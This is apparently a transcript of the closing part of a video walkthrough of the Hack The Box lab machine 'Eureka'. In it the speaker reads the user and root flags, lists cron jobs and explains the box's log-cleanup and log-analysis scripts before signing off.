great. So we're going to actually fix that. I don't know why it came so early. So secondly, we want to set it for color. So I think we're good to go. Nice. So we can cut root.txt. I can also cut /home/Miranda Weiss/user.txt. Okay, great. We can also explore other parts, which is the opt. So we have some script we're not able to access the other time. So cd scripts ls. So you can see all the list of scripts within the application. We have the log cleanups. So I'm thinking, let's see, cat log cleanup. So you can see our application log. So I think this is what is cleaning up the application log every 2 minutes or so. I can't remember, or less than 1 minute. That is why we are losing, and every time we send a payload and we delay for less than 2 or 3 minutes, you see that this particular script clean up the application data or whatever we put in there and replace it with a new application data. So you could actually analyze this and see what this file is doing. But I personally am interested in the cron job to see why we have to wait for some time before the scripts actually execute. So what you can do here is you can type cron tab -l, which is expected to list all the cron jobs. So you can see it. We have this particular log cleanup, which is executing every 2 minutes. We have another script, Miranda login simulator. We also have web application launcher. So let me just try to see, before we end this video, let's go to root, what this other script is doing. So let's just grab let's call it analyze this script. So what does it do? Runs logs analysis in the background, and for 2 different application logs. We have the cloud gateway log, we have the user management service log. This likely use the log analyze.sh script, possibly the one you showed earlier. Okay, it's run asynchronously, so both starts at once, sleeps for 10, pauses the script for 10 seconds, gives the log analysis script time to read the file before deletion, then finds and delete log file older than 10 minutes, okay, except compressed file, which is gzip files, help keep log clean and prevent log buildup on the system, then could delete actively used log if not carefully timed. We also have another thing, restore static log file. The opt/script to override the application log may be resetting the log files to a known state for testing and analysis. So this is what I was actually talking about. If apps are running, this might truncate or override active log, possibly causing race condition. We just have other necessary information. So it analyzes live logs, clean up old logs to save space, restore known baseline logs, possibly for testing or repeatable analysis, and fix permission to avoid web apps error. So guys, I think that is the much we can take for today. We just successfully gained the roots and the user flag for this Eureka Hack the Box challenge. So guys, if you've learned 1 or 2 things from this video, make sure you like, subscribe, and share, and I'll see you in the next video.